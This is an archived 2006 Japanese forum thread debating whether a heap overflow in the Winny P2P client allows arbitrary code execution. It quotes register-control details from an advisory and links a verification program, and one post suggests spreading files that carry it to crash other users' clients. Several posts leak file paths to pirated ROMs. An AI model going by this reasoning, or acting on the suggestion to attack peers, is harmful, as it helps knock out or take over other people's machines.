「call dword ptr [ebx+0ch]」

これのことなんだろうけど、callするのは[ebx+0ch]のアドレスに対してなんだが。

877 :[名無し]さん(bin+cue).rar:2006/04/22(土) 21:12:40 ID:v0UO1VG00
(1) 0052290A mov dword ptr [edx],eax ; We can control both of EDX and EAX
これで任意のプログラム+エントリポイントを書き込んで

(2) 00406011 call dword ptr [ebx+0ch] ; We can control EBX
これでcallする

ということね
1パケで4byteしか書き込めないとなると相当メンドクサイ話だが

878 :[名無し]さん(bin+cue).rar:2006/04/22(土) 21:54:36 ID:d65GLnZk0
主を失い既に2年。
度重なるクラック版など、さまざまな障害に耐えてきた
世界屈指のP2Pネットワークもついに崩壊の時を迎えるのかもしれんね。

879 :[名無し]さん(bin+cue).rar:2006/04/22(土) 22:02:58 ID:v0UO1VG00
>>852がほんとならpに移行するだけじゃないか

880 :[名無し]さん(bin+cue).rar:2006/04/23(日) 00:13:05 ID:S5dUCk7X0
情報が錯綜としてるのに
使わせない方向に持って行きたい連中と使い続けたい連中までが錯綜としてかなり微妙だ。。。

まとめると、現状では
・lark版以外が落とされるのは確定
・lark版以外で任意のコードを実行させれるかは微妙
・lark版は落とすことも無理かもしれないが詳細不明
だよな?

881 :[名無し]さん(bin+cue).rar:2006/04/23(日) 00:18:43 ID:h3pZAwb10
renyは

882 :[名無し]さん(bin+cue).rar:2006/04/23(日) 00:19:12 ID:Sexr3X/10
そうそう。
『落ちない』から『任意のコードの実行もできない』とはならない。

883 :[名無し]さん(bin+cue).rar:2006/04/23(日) 00:50:32 ID:S5dUCk7X0
すまん
http://www.eeye.com/html/research/advisories/AD20060421.html
にちょっと詳しい経過が載ってた

3/22/2006: IPA notified of this vulnerability. (Information-technology Promotion Agency. http://www.ipa.go.jp/index-e.html)
IPAが我々の報告を受け取った

4/11/2006: IPA responds to our notice. The author of Winny insists that code execution is impossible. We choose to continue to work with the IPA and send additional detailed information about this heap overflow and how heap overflows are exploited.
IPAが「金子が任意コード実行は無理と言ってるよ」と言ってきたので、もっと詳しい報告をしてコード実行の仕組みを教えてやった

4/16/2006: The IPA responds to our information. Due to other circumstances, the author cannot fix this vulnerability.
IPAが我々の主張を認めた。金子は色々アレでWinny直せない

任意コード実行はIPAで確認済みなのか?俺の英語力のせいだったらスマン

884 :[名無し]さん(bin+cue).rar:2006/04/23(日) 00:59:32 ID:ddt48Nbf0
>>883
いんや、俺はIPAの勇み足じゃねーのって思ってる。

885 :[名無し]さん(bin+cue).rar:2006/04/23(日) 01:21:13 ID:SwPYxHIW0
文面通り受け取れば任意コード実行確認済みってことになるけど
この手の英語文献読み慣れてない漏れとしては、妙に抽象的っつーか
悪用されないために、としたってもう少し情報出せるだろって気がするんだが
この世界っていつもこういうもんなのかな?

886 :[名無し]さん(bin+cue).rar:2006/04/23(日) 02:18:00 ID:RJvO7aQI0
>>885
4byteで何ができるって?
BOFの時点で整合性が取れなくなって落ちるのに?

887 :[名無し]さん(bin+cue).rar:2006/04/23(日) 03:36:34 ID:CAxALslL0
(1) 0052290A mov dword ptr [edx],eax ; We can control both of EDX and EAX
の方をみてみたら直後に
0052290C mov dword ptr [eax+4],edx
があるから、eaxをコントロールできたとしても[eax+4]が書き込み可でないと0052290Cで落ちる
書き込むデータがアドレスとしても意味を成さなきゃいけないとなると、ジャンプテーブルを書き換えるくらいが関の山で、
プログラム書き込みなんてまず無理だよ

In both cases, we confirmed the ability to execute our own code.

とあるが、この穴だけでどーやって任意のプログラムを実行したんだろうか
固定位置の通信バッファでもあるんかね

888 :[名無し]さん(bin+cue).rar:2006/04/23(日) 03:55:45 ID:RJvO7aQI0
バッファがあれば、47氏もタイ-ホの時点で、ただちにnyネットワークを止められただろうに
ある意味、堅牢で作者でさえどうしようもなかった…府警が余計なこと言ったしな。

落とすにしても、クローズドのLAN環境だから試行できるだけで
そんな特異なパケットはWANを通らない。えーと?? 脆弱性じゃないやん。

889 :[名無し]さん(bin+cue).rar:2006/04/23(日) 05:58:07 ID:hzEuPCSN0
バッファっておめえ・・・

890 :[名無し]さん(bin+cue).rar:2006/04/23(日) 07:01:56 ID:dFUgKS3N0
バッファはあるよなあ。バッファはw

891 :[名無し]さん(bin+cue).rar:2006/04/23(日) 07:34:34 ID:8EsbKi300
俺だってバッファがあれば勝ち組だよ

892 :[名無し]さん(bin+cue).rar:2006/04/23(日) 08:24:30 ID:qJp/HRA10
バッファオーバーフローを気にするくらいなら、
まずは買ってそのまんまのルータのパスを変えろ。

893 :[名無し]さん(bin+cue).rar:2006/04/23(日) 09:12:52 ID:2/Y7gEog0
http://www.nikkansports.com/general/f-gn-tp0-20060422-22180.html
第三者にパソコンを乗っ取られ、ウイルスに感染させられたり不正なプログラムを書き込まれたりする

894 :[名無し]さん(bin+cue).rar:2006/04/23(日) 09:39:13 ID:yeq3RUuS0
金子は試しもしないで任意のコードが実行出来るわけないって言ってたのか、あほだな。

895 :[名無し]さん(bin+cue).rar:2006/04/23(日) 10:44:39 ID:Sexr3X/10
他人が言っているだけだと言う意味ではどの情報も同等の信憑性しかないよ。
報道機関なんて他人の言ってることを垂れ流しにしてるだけだし。

896 :[名無し]さん(bin+cue).rar:2006/04/23(日) 12:46:19 ID:DMu7VIpW0
ny脆弱性の検証プログラム
ttp://d.hatena.ne.jp/ultraist/20060422/p2


897 :[名無し]さん(bin+cue).rar:2006/04/23(日) 12:56:07 ID:UcE2Hbyq0
思いっきりスレ違いなんだよカスども
馬鹿はスレタイも読めないのか?

898 :[名無し]さん(bin+cue).rar:2006/04/23(日) 13:15:42 ID:bMsu+Uo+0
ネタも無(ry

899 :[名無し]さん(bin+cue).rar:2006/04/23(日) 14:29:40 ID:8VzYGjWY0
なんか知らんが攻撃されてるっぽい
ひっきりなしに先生が忠告してくる

900 :[名無し]さん(bin+cue).rar:2006/04/23(日) 14:38:14 ID:JYzQDxVk0
>>897

901 :[名無し]さん(bin+cue).rar:2006/04/23(日) 17:18:08 ID:1YiD0+720
>>896
それを仕込んだファイルを放流すれば新規流出は防げそうだな。

902 :[名無し]さん(bin+cue).rar:2006/04/23(日) 21:31:43 ID:RJvO7aQI0
ポートを一定時間でランダムに変えてやれば大丈夫かな
ルータ側はUPnPで対応させるとして、意外と簡単そうだな

903 :[名無し]さん(bin+cue).rar:2006/04/24(月) 02:58:21 ID:s66b+fEH0


904 :[名無し]さん(bin+cue).rar:2006/04/24(月) 03:21:51 ID:wzd3W7fu0



905 :啓志:2006/04/24(月) 06:28:20 ID:JxVAVeJr0
C:\Documents and Settings\啓志\My Documents\Winny2b71\Winny2\Down\Bbs


906 :啓志:2006/04/24(月) 06:32:16 ID:JxVAVeJr0
D:\(同人ゲーム)(ロリ)体育倉庫


907 :啓志:2006/04/24(月) 06:35:29 ID:JxVAVeJr0
D:\SNES\Super Famista 5 (J).sfc


908 :啓志:2006/04/24(月) 06:36:41 ID:JxVAVeJr0
D:\SNES\Ranma 2 Bun no 1 - Chogi Ranbu Hen (J).smc


909 :啓志:2006/04/24(月) 06:37:18 ID:JxVAVeJr0
D:\SNES\(エミュレーター)スーパーファミコン (日本語版)


910 :[名無し]さん(bin+cue).rar:2006/04/24(月) 06:52:47 ID:v2Qztjuk0
新手のウィルス?

911 :[名無し]さん(bin+cue).rar:2006/04/24(月) 07:54:28 ID:cAstsy/g0
イオナかイオナの亜種でね?

912 :[名無し]さん(bin+cue).rar:2006/04/24(月) 08:28:20 ID:eaxSbX8p0
愉快犯

913 :[名無し]さん(bin+cue).rar:2006/04/24(月) 09:50:13 ID:SSaJIkfu0
ネトゲからの書き込みですた

914 :[名無し]さん(bin+cue).rar:2006/04/24(月) 09:50:47 ID:SSaJIkfu0
誤爆ww

915 :[名無し]さん(bin+cue).rar:2006/04/24(月) 10:03:06 ID:YqB/8bPw0
>>687

916 :[名無し]さん(bin+cue).rar:2006/04/24(月) 18:38:50 ID:YGu2YkEl0
(P2Pの)ウイルス対策にソフト紹介してみる(シェアだけど試用可)
ttp://www.vector.co.jp/magazine/softnews/040901/n0409012.html
「選択して解凍」で中身の一覧が見れるのでexeやscrも事前に察知できる
.zip.zipなんてファイルを見つけたら)以下略

917 :[名無し]さん(bin+cue).rar:2006/04/24(月) 18:43:18 ID:VNunriHX0
>>916
これ読むといい
http://tmp6.2ch.net/test/read.cgi/download/1145371491/8

918 :[名無し]さん(bin+cue).rar:2006/04/24(月) 18:58:31 ID:YGu2YkEl0
>>917
ごめん。もう既出だったか
WinRARにこんな機能があるとは知らなかった。ありがとう。

919 :[名無し]さん(bin+cue).rar:2006/04/24(月) 19:08:25 ID:h3/VXlVr0
>>918
その機能はVer.3.50以降らしい 3.20では機能ない

920 :[名無し]さん(bin+cue).rar:2006/04/24(月) 20:19:41 ID:UPiKPBpS0
既出っつーか、ほとんどの解凍ソフトには中身を見る機能がついてると思うんだが。

921 :[名無し]さん(bin+cue).rar:2006/04/24(月) 20:25:18 ID:VNunriHX0
今まで知らなかったことを知り、それを他人にも教えてあげたいという気持ち。 これが愛なのです。

922 :[名無し]さん(bin+cue).rar:2006/04/24(月) 23:42:31 ID:/Z7mKFV/0
ttp://itpro.nikkeibp.co.jp/article/Watcher/20060424/236080/
発見者が語る「Winnyのセキュリティ・ホール」

923 :[名無し]さん(bin+cue).rar:2006/04/24(月) 23:50:39 ID:s3ZMg+8y0
>>922
http://tmp6.2ch.net/test/read.cgi/download/1145802645/201


924 :[名無し]さん(bin+cue).rar:2006/04/25(火) 00:01:30 ID:M/cO6whq0
そういえば、Winnyの脆弱性に関してはかなり前からこのスレでも言われてたよな

925 :[名無し]さん(bin+cue).rar:2006/04/25(火) 00:19:00 ID:I9rR9As30
>>924
誰も真に受けてなかったけどな。

どうでもいいけど、
誰か情報の面倒を見てくれる香具師はいないのか?

926 :[名無し]さん(bin+cue).rar:2006/04/25(火) 03:31:27 ID:C8LmdkMI0
バッファオーバーフロー起こさせるだけなら他のやり方がいくらでもあるわけで、わざわざどこの誰に
繋がるかわからないWinnyのノードを辿って攻撃用ツールに使う香具師はいないと思うんだが…

927 :[名無し]さん(bin+cue).rar:2006/04/25(火) 11:34:28 ID:NaZ0znLO0
火曜なのにノートンupdateか。なんかあった?

928 :[名無し]さん(bin+cue).rar:2006/04/25(火) 20:04:40 ID:xsbcNsgB0
http://www.trendmicro.com/jp/security/report/news/archive/2006/vnews060424.htm

shareもって書いてあるけど
antinnyの亜種のこと?

929 :[名無し]さん(bin+cue).rar:2006/04/25(火) 20:24:40 ID:l2xkhSrv0
>>928
Winny以外のファイル共有ソフトShare(シャレ)ユーザも狙うAntinnyウイルスが発生しています

(´ω`) シャレ・・・

930 :[名無し]さん(bin+cue).rar:2006/04/25(火) 20:42:53 ID:c1ilqwZ/0
これってウィルスの書き込み?
http://news18.2ch.net/test/read.cgi/news2/1145769758/l50


931 :[名無し]さん(bin+cue).rar:2006/04/25(火) 20:49:26 ID:LnPOfOFO0
>>930
Trojan.Sufiage.B
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.sufiage.b.html

932 :[名無し]さん(bin+cue).rar:2006/04/25(火) 22:36:54 ID:IdXNIBWi0
nyの穴は乗っ取りも可能か・・

933 :[名無し]さん(bin+cue).rar:2006/04/25(火) 23:12:03 ID:6hkk/nHT0
>>929
TVだったかニュースサイトだったか忘れたが、
こないだ(シェア)って読みがついたとき2chでは大量に洒落だろってツッコミがはいった

(シャレ)ってつけると一般人が「シェアーでしょ?」って疑問をもつのだろうか

934 :[名無し]さん(bin+cue).rar:2006/04/25(火) 23:22:37 ID:G+96hnaA0
シャレってなんだ、ネタかと思ったらマジでそう書いてあるじゃんw

・・・・・・( ゚Д゚)

935 :[名無し]さん(bin+cue).rar:2006/04/26(水) 00:05:47 ID:opH7SDKL0
http://is.kingsoft.jp/support/info01.htm
ファイル共有ソフトを介して流通するウイルスと情報漏洩
ファイル共有を目的とした「Winny(ウィニー)」や「Share(シェア)」という名称のソフトを介して、
ウイルスに感染やパソコンに保存された情報漏洩の被害が多発しています。

936 :[名無し]さん(bin+cue).rar:2006/04/26(水) 00:25:49 ID:tkbSor9j0
>>933
既出(ガイシュツ)巣窟(すくつ)と同じだろ
わざと間違える事で2ch語として
どう読むかで2chネラーか一般人かを判断できると

937 :[名無し]さん(bin+cue).rar:2006/04/26(水) 00:39:03 ID:RYcGToCT0
>935
胎児くせーurlだと思ったらやっぱ胎児食ってる連中だった。

938 :[名無し]さん(bin+cue).rar:2006/04/26(水) 01:47:25 ID:bST5aTmD0
ttp://www.kingsoft.jp/release/060320.htm
>「Winny」が起動されようとしていますが、
>情報漏洩の危険がありお勧めできません。
なんだこりゃ

939 :[名無し]さん(bin+cue).rar:2006/04/26(水) 03:10:34 ID:xkIM4yfS0
本当は、こう言いたいのだろうな、華の国は
>「Winodws」が起動されようとしていますが、
>情報漏えいの危険がありお勧めできません。


940 :[名無し]さん(bin+cue).rar:2006/04/26(水) 03:17:31 ID:hevP2aro0
>「パソコン」が起動されようとしていますが、
>情報漏洩の危険がありお勧めできません。

941 :[名無し]さん(bin+cue).rar:2006/04/26(水) 15:13:16 ID:YstJlWXj0
中華ですらwinnyを悪く見てるのに日本ときたら・・・
日本人は中国人にも劣るんだな

942 :[名無し]さん(bin+cue).rar:2006/04/26(水) 15:16:48 ID:Ntta/IEK0
中華のアレはエシュロン中華版入りだけどな
そっちのほうが怖い

943 :[名無し]さん(bin+cue).rar:2006/04/26(水) 15:25:01 ID:VzEn6SRA0
>>941
海賊版売れなくなるからな

944 :[名無し]さん(bin+cue).rar:2006/04/26(水) 18:05:22 ID:JaSQKXcu0
>>943
すごく納得した

233 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)